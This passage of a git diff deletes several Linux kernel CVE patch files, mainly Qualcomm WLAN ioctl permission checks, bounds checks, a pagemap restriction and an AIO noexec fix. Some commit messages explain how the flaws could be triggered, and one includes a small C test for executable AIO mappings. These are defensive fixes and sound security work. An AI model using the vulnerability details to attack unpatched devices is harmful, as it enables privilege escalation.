-Git-commit: 9eeafd788f53cc37c169b299f91ca9c558b228f9
-Bug: 25344453
-Signed-off-by: Amarnath Hullur Subramanyam <amarnath@codeaurora.org>
----
- drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-index 841ed4c..fc8c917 100644
---- a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-@@ -8143,6 +8143,12 @@ static int iw_clear_dynamic_mcbc_filter(struct net_device *dev,
-     tpSirWlanSetRxpFilters wlanRxpFilterParam;
-     hddLog(VOS_TRACE_LEVEL_INFO_HIGH, "%s: ", __func__);
- 
-+    if (!capable(CAP_NET_ADMIN)) {
-+        VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+                 FL("permission check failed"));
-+        return -EPERM;
-+    }
-+
-     //Reset the filter to INI value as we have to clear the dynamic filter
-     pHddCtx->configuredMcastBcastFilter = pHddCtx->cfg_ini->mcastBcastFilterSetting;
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0024.patch b/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0024.patch
deleted file mode 100644
index 3e094bf9..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0024.patch
+++ /dev/null
@@ -1,40 +0,0 @@
-From 2f7ecc8b88843b3b53bd7d2328f0d53f3794f456 Mon Sep 17 00:00:00 2001
-From: Amarnath Hullur Subramanyam <amarnath@codeaurora.org>
-Date: Wed, 28 Oct 2015 21:17:28 -0700
-Subject: wlan:Check priviledge permission for SET_THREE_INT_GET_NONE
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_THREE_INT_GET_NONE IOCTL,
-making sure user task has right permission to process the command.
-
-CRs-Fixed: 930948
-Git-commit: aaeeed43f9597631982835481c7cf2621f6455f0
-Bug: 25344453
-Signed-off-by: Amarnath Hullur Subramanyam <amarnath@codeaurora.org>
----
- drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-index fc8c917..51b52f3 100644
---- a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-@@ -6846,6 +6846,12 @@ int iw_set_three_ints_getnone(struct net_device *dev,
-         return -EBUSY;
-     }
- 
-+    if (!capable(CAP_NET_ADMIN)) {
-+        VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+                  FL("permission check failed"));
-+        return -EPERM;
-+    }
-+
-     switch(sub_cmd) {
- 
-     case WE_SET_WLAN_DBG:
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0025.patch b/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0025.patch
deleted file mode 100644
index 76f0bb5b..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0025.patch
+++ /dev/null
@@ -1,39 +0,0 @@
-From 9fd4483e08349eb1570c42da8acbac33e70a6e02 Mon Sep 17 00:00:00 2001
-From: Amarnath Hullur Subramanyam <amarnath@codeaurora.org>
-Date: Wed, 28 Oct 2015 21:23:09 -0700
-Subject: wlan:Check priviledge permission for SET_VAR_INTS_GETNONE IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_VAR_INTS_GETNONE, making
-sure user task has right permission to process the command.
-
-CRs-Fixed: 930942
-Git-commit: 0858d21caf17d56f8d2353590c1ec245073222e0
-Bug: 25344453
-Signed-off-by: Amarnath Hullur Subramanyam <amarnath@codeaurora.org>
----
- drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c | 5 +++++
- 1 file changed, 5 insertions(+)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-index 51b52f3..ba9d0ff 100644
---- a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-@@ -7520,6 +7520,11 @@ static int __iw_set_var_ints_getnone(struct net_device *dev,
-     int staId = 0;
-     struct iw_point s_priv_data;
- 
-+    if (!capable(CAP_NET_ADMIN)) {
-+        VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+                FL("permission check failed"));
-+        return -EPERM;
-+    }
-     /* helper function to get iwreq_data with compat handling. */
-     if (hdd_priv_get_data(&s_priv_data, wrqu)) {
-        return -EINVAL;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0026.patch b/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0026.patch
deleted file mode 100644
index 45000280..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0026.patch
+++ /dev/null
@@ -1,44 +0,0 @@
-From fb3616763bd5909e86cddd19f3569a26b4f93f49 Mon Sep 17 00:00:00 2001
-From: Amarnath Hullur Subramanyam <amarnath@codeaurora.org>
-Date: Wed, 28 Oct 2015 21:25:21 -0700
-Subject: wlan: ensure permission for WLAN_FTM_PRIV_SET_CHAR_GET_NONE
-
-prima to qcacld-2.0 propagation.
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation. Hence,
-in driver, before processing WLAN_FTM_PRIV_SET_CHAR_GET_NONE,
-making sure user task has right permission to process the command.
-
-CRs-Fixed: 930837
-Git-commit: c4928591bbcd131f10f6ea337a4bd6ee3e141c2a
-Git-repo: https://www.codeaurora.org/cgit/quic/la/platform/vendor/qcom-opensource/wlan/prima/
-Bug: 25344453
-Signed-off-by: Amarnath Hullur Subramanyam <amarnath@codeaurora.org>
----
- drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-index ba9d0ff..31205f3 100644
---- a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-@@ -6193,6 +6193,13 @@ static int iw_setchar_getnone(struct net_device *dev, struct iw_request_info *in
- #endif /* WLAN_FEATURE_VOWIFI */
-     struct iw_point s_priv_data;
- 
-+    if (!capable(CAP_NET_ADMIN))
-+    {
-+        VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+                  FL("permission check failed"));
-+        return -EPERM;
-+    }
-+
-     if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress)
-     {
-         VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_FATAL,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0027.patch b/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0027.patch
deleted file mode 100644
index 69f62656..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0027.patch
+++ /dev/null
@@ -1,44 +0,0 @@
-From ca7c085fb70861a55d9d3a46de012a3e0998ca61 Mon Sep 17 00:00:00 2001
-From: Amarnath Hullur Subramanyam <amarnath@codeaurora.org>
-Date: Wed, 28 Oct 2015 21:27:11 -0700
-Subject: wlan:Check priviledge permission for SET_CHANNEL_RANGE
-
-prima to qcacld-2.0 propagation.
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_CHANNEL_RANGE IOCTL,
-making sure user task has right permission to process the command.
-
-CRs-Fixed: 930555
-Git-commit: bcb1abfd803c6bb98bad35228d7c4f85b754836d
-Git-repo: https://www.codeaurora.org/cgit/quic/la/platform/vendor/qcom-opensource/wlan/prima/
-Bug: 25344453
-Signed-off-by: Amarnath Hullur Subramanyam <amarnath@codeaurora.org>
----
- drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-index 31205f3..1b8346d0 100644
---- a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-@@ -3336,6 +3336,13 @@ static int iw_softap_set_channel_range( struct net_device *dev,
-     tHalHandle hHal = WLAN_HDD_GET_HAL_CTX(pHostapdAdapter);
-     hdd_context_t *pHddCtx = WLAN_HDD_GET_CTX(pHostapdAdapter);
- 
-+    if (!capable(CAP_NET_ADMIN))
-+    {
-+        VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+                  FL("permission check failed"));
-+        return -EPERM;
-+    }
-+
-     status = WLANSAP_SetChannelRange(hHal, startChannel, endChannel, band);
- 
-     if (VOS_STATUS_SUCCESS != status)
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0028.patch b/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0028.patch
deleted file mode 100644
index 05511eac..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0028.patch
+++ /dev/null
@@ -1,44 +0,0 @@
-From f66afdc6840e7647a965487194873826de57e655 Mon Sep 17 00:00:00 2001
-From: Amarnath Hullur Subramanyam <amarnath@codeaurora.org>
-Date: Sun, 1 Nov 2015 23:04:42 -0800
-Subject: wlan:Check priviledge permission for SET_CHANNEL_RANGE
-
-prima to qcacld-2.0 propagation.
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_CHANNEL_RANGE IOCTL,
-making sure user task has right permission to process the command.
-
-CRs-Fixed: 930555
-Git-commit: bcb1abfd803c6bb98bad35228d7c4f85b754836d
-Git-repo: https://www.codeaurora.org/cgit/quic/la/platform/vendor/qcom-opensource/wlan/prima/
-Bug: 25344453
-Signed-off-by: Amarnath Hullur Subramanyam <amarnath@codeaurora.org>
----
- drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_hostapd.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_hostapd.c b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_hostapd.c
-index b95a853..e534763 100644
---- a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_hostapd.c
-+++ b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_hostapd.c
-@@ -3339,6 +3339,13 @@ static int iw_softap_set_channel_range(struct net_device *dev,
-     VOS_STATUS status;
-     int ret = 0; /* success */
- 
-+    if (!capable(CAP_NET_ADMIN))
-+    {
-+        VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+                  FL("permission check failed"));
-+        return -EPERM;
-+    }
-+
-     status = WLANSAP_SetChannelRange(hHal,startChannel,endChannel,band);
-     if(status != VOS_STATUS_SUCCESS)
-     {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0819/ANY/0001.patch.disabled b/Patches/Linux_CVEs/CVE-2016-0819/ANY/0001.patch.disabled
deleted file mode 100644
index 63017fa5..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0819/ANY/0001.patch.disabled
+++ /dev/null
@@ -1,35 +0,0 @@
-From e32c1b1a3d368afe1b09e81b3087ab8810282e93 Mon Sep 17 00:00:00 2001
-From: Srinivasarao P <spathi@codeaurora.org>
-Date: Tue, 1 Mar 2016 12:16:03 +0530
-Subject: perf: duplicate deletion of perf event
-
-a malicious app can open a perf event with constraint_duplicate
-bit set, disable the event, and close the fd.  On closing the fd,
-the perf_release() modification causes the kernel to clean up
-the event as if it still were enabled, leading to the event
-being removed from a list twice.
-
-CRs-Fixed: 977563
-Change-Id: I5fbec3722407d2f3d0ff0d9f7097c5889e31fd62
-Signed-off-by: Srinivasarao P <spathi@codeaurora.org>
----
- kernel/events/core.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/kernel/events/core.c b/kernel/events/core.c
-index 7dd822b..868300d 100644
---- a/kernel/events/core.c
-+++ b/kernel/events/core.c
-@@ -6243,6 +6243,9 @@ SYSCALL_DEFINE5(perf_event_open,
- 	if (err)
- 		return err;
- 
-+	if (attr.constraint_duplicate || attr.__reserved_1)
-+		return -EINVAL;
-+
- 	if (!attr.exclude_kernel) {
- 		if (perf_paranoid_kernel() && !capable(CAP_SYS_ADMIN))
- 			return -EACCES;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0821/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-0821/ANY/0001.patch
deleted file mode 100644
index 7fd8ff5f..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0821/ANY/0001.patch
+++ /dev/null
@@ -1,45 +0,0 @@
-From 8a5e5e02fc83aaf67053ab53b359af08c6c49aaf Mon Sep 17 00:00:00 2001
-From: Vasily Kulikov <segoon@openwall.com>
-Date: Wed, 9 Sep 2015 15:36:00 -0700
-Subject: [PATCH] include/linux/poison.h: fix LIST_POISON{1,2} offset
-
-Poison pointer values should be small enough to find a room in
-non-mmap'able/hardly-mmap'able space.  E.g.  on x86 "poison pointer space"
-is located starting from 0x0.  Given unprivileged users cannot mmap
-anything below mmap_min_addr, it should be safe to use poison pointers
-lower than mmap_min_addr.
-
-The current poison pointer values of LIST_POISON{1,2} might be too big for
-mmap_min_addr values equal or less than 1 MB (common case, e.g.  Ubuntu
-uses only 0x10000).  There is little point to use such a big value given
-the "poison pointer space" below 1 MB is not yet exhausted.  Changing it
-to a smaller value solves the problem for small mmap_min_addr setups.
-
-The values are suggested by Solar Designer:
-http://www.openwall.com/lists/oss-security/2015/05/02/6
-
-Signed-off-by: Vasily Kulikov <segoon@openwall.com>
-Cc: Solar Designer <solar@openwall.com>
-Cc: Thomas Gleixner <tglx@linutronix.de>
-Cc: "Kirill A. Shutemov" <kirill.shutemov@linux.intel.com>
-Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
----
- include/linux/poison.h | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/include/linux/poison.h b/include/linux/poison.h
-index 2110a81c5e2af..253c9b4198eff 100644
---- a/include/linux/poison.h
-+++ b/include/linux/poison.h
-@@ -19,8 +19,8 @@
-  * under normal circumstances, used to verify that nobody uses
-  * non-initialized list entries.
-  */
--#define LIST_POISON1  ((void *) 0x00100100 + POISON_POINTER_DELTA)
--#define LIST_POISON2  ((void *) 0x00200200 + POISON_POINTER_DELTA)
-+#define LIST_POISON1  ((void *) 0x100 + POISON_POINTER_DELTA)
-+#define LIST_POISON2  ((void *) 0x200 + POISON_POINTER_DELTA)
- 
- /********** include/linux/timer.h **********/
- /*
diff --git a/Patches/Linux_CVEs/CVE-2016-0823/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-0823/ANY/0001.patch
deleted file mode 100644
index f01f6922..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0823/ANY/0001.patch
+++ /dev/null
@@ -1,45 +0,0 @@
-From ab676b7d6fbf4b294bf198fb27ade5b0e865c7ce Mon Sep 17 00:00:00 2001
-From: "Kirill A. Shutemov" <kirill.shutemov@linux.intel.com>
-Date: Mon, 9 Mar 2015 23:11:12 +0200
-Subject: pagemap: do not leak physical addresses to non-privileged userspace
-
-As pointed by recent post[1] on exploiting DRAM physical imperfection,
-/proc/PID/pagemap exposes sensitive information which can be used to do
-attacks.
-
-This disallows anybody without CAP_SYS_ADMIN to read the pagemap.
-
-[1] http://googleprojectzero.blogspot.com/2015/03/exploiting-dram-rowhammer-bug-to-gain.html
-
-[ Eventually we might want to do anything more finegrained, but for now
-  this is the simple model.   - Linus ]
-
-Signed-off-by: Kirill A. Shutemov <kirill.shutemov@linux.intel.com>
-Acked-by: Konstantin Khlebnikov <khlebnikov@openvz.org>
-Acked-by: Andy Lutomirski <luto@amacapital.net>
-Cc: Pavel Emelyanov <xemul@parallels.com>
-Cc: Andrew Morton <akpm@linux-foundation.org>
-Cc: Mark Seaborn <mseaborn@chromium.org>
-Cc: stable@vger.kernel.org
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
----
- fs/proc/task_mmu.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/fs/proc/task_mmu.c b/fs/proc/task_mmu.c
-index 956b75d..6dee68d 100644
---- a/fs/proc/task_mmu.c
-+++ b/fs/proc/task_mmu.c
-@@ -1325,6 +1325,9 @@ out:
- 
- static int pagemap_open(struct inode *inode, struct file *file)
- {
-+	/* do not disclose physical addresses: attack vector */
-+	if (!capable(CAP_SYS_ADMIN))
-+		return -EPERM;
- 	pr_warn_once("Bits 55-60 of /proc/PID/pagemap entries are about "
- 			"to stop being page-shift some time soon. See the "
- 			"linux/Documentation/vm/pagemap.txt for details.\n");
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0843/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-0843/ANY/0001.patch
deleted file mode 100644
index 34dc4591..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0843/ANY/0001.patch
+++ /dev/null
@@ -1,101 +0,0 @@
-From a599a7a83745820b3e1bee9d4b625bd54337e4d0 Mon Sep 17 00:00:00 2001
-From: Kishor PK <kpbhat@codeaurora.org>
-Date: Thu, 18 Feb 2016 15:26:50 +0530
-Subject: msm: perf: validate input argument of ev_constraints functions
-
-Validate input argument before writing into
-pmu_constraints_codes array.
-
-CRs-Fixed: 975404
-Change-Id: Id68b1d2201ab1af783af2236833b1dc894e08cc7
-Signed-off-by: Kishor PK <kpbhat@codeaurora.org>
----
- arch/arm/mach-msm/perf_event_msm_krait_l2.c | 23 +++++++++++++++++------
- 1 file changed, 17 insertions(+), 6 deletions(-)
-
-diff --git a/arch/arm/mach-msm/perf_event_msm_krait_l2.c b/arch/arm/mach-msm/perf_event_msm_krait_l2.c
-index 65a5d2f..43233ab 100644
---- a/arch/arm/mach-msm/perf_event_msm_krait_l2.c
-+++ b/arch/arm/mach-msm/perf_event_msm_krait_l2.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2011,2012,2014 The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2011,2012,2014,2016 The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -18,13 +18,15 @@
- 
- #include <mach/msm-krait-l2-accessors.h>
- 
-+#define PMU_CODES_SIZE 64
-+
- /*
-  * The L2 PMU is shared between all CPU's, so protect
-  * its bitmap access.
-  */
- struct pmu_constraints {
- 	u64 pmu_bitmap;
--	u8 codes[64];
-+	u8 codes[PMU_CODES_SIZE];
- 	raw_spinlock_t lock;
- } l2_pmu_constraints = {
- 	.pmu_bitmap = 0,
-@@ -427,10 +429,9 @@ static int msm_l2_test_set_ev_constraint(struct perf_event *event)
- 	u8 group = evt_type & 0x0000F;
- 	u8 code = (evt_type & 0x00FF0) >> 4;
- 	unsigned long flags;
--	u32 err = 0;
-+	int err = 0;
- 	u64 bitmap_t;
- 	u32 shift_idx;
--
- 	if (evt_prefix == L2_TRACECTR_PREFIX)
- 		return err;
- 	/*
-@@ -444,6 +445,11 @@ static int msm_l2_test_set_ev_constraint(struct perf_event *event)
- 
- 	shift_idx = ((reg * 4) + group);
- 
-+	if (shift_idx >= PMU_CODES_SIZE) {
-+		err =  -EINVAL;
-+		goto out;
-+	}
-+
- 	bitmap_t = 1 << shift_idx;
- 
- 	if (!(l2_pmu_constraints.pmu_bitmap & bitmap_t)) {
-@@ -484,6 +490,7 @@ static int msm_l2_clear_ev_constraint(struct perf_event *event)
- 	unsigned long flags;
- 	u64 bitmap_t;
- 	u32 shift_idx;
-+	int err = 1;
- 
- 	if (evt_prefix == L2_TRACECTR_PREFIX)
- 		return 1;
-@@ -491,6 +498,10 @@ static int msm_l2_clear_ev_constraint(struct perf_event *event)
- 
- 	shift_idx = ((reg * 4) + group);
- 
-+	if (shift_idx >= PMU_CODES_SIZE) {
-+		err = -EINVAL;
-+		goto out;
-+	}
- 	bitmap_t = 1 << shift_idx;
- 
- 	/* Clear constraint bit. */
-@@ -498,9 +509,9 @@ static int msm_l2_clear_ev_constraint(struct perf_event *event)
- 
- 	/* Clear code. */
- 	l2_pmu_constraints.codes[shift_idx] = -1;
--
-+out:
- 	raw_spin_unlock_irqrestore(&l2_pmu_constraints.lock, flags);
--	return 1;
-+	return err;
- }
- 
- int get_num_events(void)
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0844/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-0844/ANY/0001.patch
deleted file mode 100644
index dcc9705e..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0844/ANY/0001.patch
+++ /dev/null
@@ -1,60 +0,0 @@
-From 90a9da2ea95e86b4f0ff493cd891a11da0ee67aa Mon Sep 17 00:00:00 2001
-From: Skylar Chang <chiaweic@codeaurora.org>
-Date: Tue, 29 Dec 2015 18:50:34 -0800
-Subject: msm: ipa: fix the mux_channel buffer overflow
-
-Add the check on ipa wan-driver to check if
-receiving more than MAX_NUM_OF_MUX_CHANNEL times
-different RMNET_IOCTL_ADD_MUX_CHANNEL ioctls
-from netmgrd.
-
-CRs-Fixed: 956393
-Change-Id: Ic8890b084a8da69fdcf54541e82f6e4961492ce1
-Signed-off-by: Skylar Chang <chiaweic@codeaurora.org>
----
- drivers/platform/msm/ipa/ipa_v2/rmnet_ipa.c | 7 ++++++-
- drivers/platform/msm/ipa/ipa_v3/rmnet_ipa.c | 6 ++++++
- 2 files changed, 12 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/platform/msm/ipa/ipa_v2/rmnet_ipa.c b/drivers/platform/msm/ipa/ipa_v2/rmnet_ipa.c
-index e30d6d1..f3b883e 100644
---- a/drivers/platform/msm/ipa/ipa_v2/rmnet_ipa.c
-+++ b/drivers/platform/msm/ipa/ipa_v2/rmnet_ipa.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -1366,6 +1366,11 @@ static int ipa_wwan_ioctl(struct net_device *dev, struct ifreq *ifr, int cmd)
- 					rmnet_mux_val.mux_id);
- 				return rc;
- 			}
-+			if (rmnet_index >= MAX_NUM_OF_MUX_CHANNEL) {
-+				IPAWANERR("Exceed mux_channel limit(%d)\n",
-+				rmnet_index);
-+				return -EFAULT;
-+			}
- 			IPAWANDBG("ADD_MUX_CHANNEL(%d, name: %s)\n",
- 			extend_ioctl_data.u.rmnet_mux_val.mux_id,
- 			extend_ioctl_data.u.rmnet_mux_val.vchannel_name);
-diff --git a/drivers/platform/msm/ipa/ipa_v3/rmnet_ipa.c b/drivers/platform/msm/ipa/ipa_v3/rmnet_ipa.c
-index 9697590..2c3e18e 100644
---- a/drivers/platform/msm/ipa/ipa_v3/rmnet_ipa.c
-+++ b/drivers/platform/msm/ipa/ipa_v3/rmnet_ipa.c
-@@ -1382,6 +1382,12 @@ static int ipa3_wwan_ioctl(struct net_device *dev, struct ifreq *ifr, int cmd)
- 					rmnet_mux_val.mux_id);
- 				return rc;
- 			}
-+			if (rmnet_ipa3_ctx->rmnet_index
-+				>= MAX_NUM_OF_MUX_CHANNEL) {
-+				IPAWANERR("Exceed mux_channel limit(%d)\n",
-+				rmnet_ipa3_ctx->rmnet_index);
-+				return -EFAULT;
-+			}
- 			IPAWANDBG("ADD_MUX_CHANNEL(%d, name: %s)\n",
- 			extend_ioctl_data.u.rmnet_mux_val.mux_id,
- 			extend_ioctl_data.u.rmnet_mux_val.vchannel_name);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10044/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-10044/ANY/0001.patch
deleted file mode 100644
index ef0ce520..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10044/ANY/0001.patch
+++ /dev/null
@@ -1,66 +0,0 @@
-From 22f6b4d34fcf039c63a94e7670e0da24f8575a5a Mon Sep 17 00:00:00 2001
-From: Jann Horn <jann@thejh.net>
-Date: Fri, 16 Sep 2016 00:31:22 +0200
-Subject: aio: mark AIO pseudo-fs noexec
-
-This ensures that do_mmap() won't implicitly make AIO memory mappings
-executable if the READ_IMPLIES_EXEC personality flag is set.  Such
-behavior is problematic because the security_mmap_file LSM hook doesn't
-catch this case, potentially permitting an attacker to bypass a W^X
-policy enforced by SELinux.
-
-I have tested the patch on my machine.
-
-To test the behavior, compile and run this:
-
-    #define _GNU_SOURCE
-    #include <unistd.h>
-    #include <sys/personality.h>
-    #include <linux/aio_abi.h>
-    #include <err.h>
-    #include <stdlib.h>
-    #include <stdio.h>
-    #include <sys/syscall.h>
-
-    int main(void) {
-        personality(READ_IMPLIES_EXEC);
-        aio_context_t ctx = 0;
-        if (syscall(__NR_io_setup, 1, &ctx))
-            err(1, "io_setup");
-
-        char cmd[1000];
-        sprintf(cmd, "cat /proc/%d/maps | grep -F '/[aio]'",
-            (int)getpid());
-        system(cmd);
-        return 0;
-    }
-
-In the output, "rw-s" is good, "rwxs" is bad.
-
-Signed-off-by: Jann Horn <jann@thejh.net>
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
----
- fs/aio.c | 7 ++++++-
- 1 file changed, 6 insertions(+), 1 deletion(-)
-
-diff --git a/fs/aio.c b/fs/aio.c
-index fb8e45b..4fe81d1 100644
---- a/fs/aio.c
-+++ b/fs/aio.c
-@@ -239,7 +239,12 @@ static struct dentry *aio_mount(struct file_system_type *fs_type,
- 	static const struct dentry_operations ops = {
- 		.d_dname	= simple_dname,
- 	};
--	return mount_pseudo(fs_type, "aio:", NULL, &ops, AIO_RING_MAGIC);
-+	struct dentry *root = mount_pseudo(fs_type, "aio:", NULL, &ops,
-+					   AIO_RING_MAGIC);
-+
-+	if (!IS_ERR(root))
-+		root->d_sb->s_iflags |= SB_I_NOEXEC;
-+	return root;
- }
- 
- /* aio_setup
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10044/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-10044/ANY/0002.patch
deleted file mode 100644
index 30a1f7d8..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10044/ANY/0002.patch
+++ /dev/null
@@ -1,12 +0,0 @@
-diff --git a/fs/aio.c b/fs/aio.c
-index d991255..3eec984 100644
---- a/fs/aio.c
-+++ b/fs/aio.c
-@@ -229,6 +229,7 @@
- 	aio_mnt = kern_mount(&aio_fs);
- 	if (IS_ERR(aio_mnt))
- 		panic("Failed to create aio fs mount.");
-+	aio_mnt->mnt_flags |= MNT_NOEXEC;
- 
- 	if (bdi_init(&aio_fs_backing_dev_info))
- 		panic("Failed to init aio fs backing dev info.");
diff --git a/Patches/Linux_CVEs/CVE-2016-10044/ANY/0002.patch.base64 b/Patches/Linux_CVEs/CVE-2016-10044/ANY/0002.patch.base64
deleted file mode 100644
index 4d91251e..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10044/ANY/0002.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
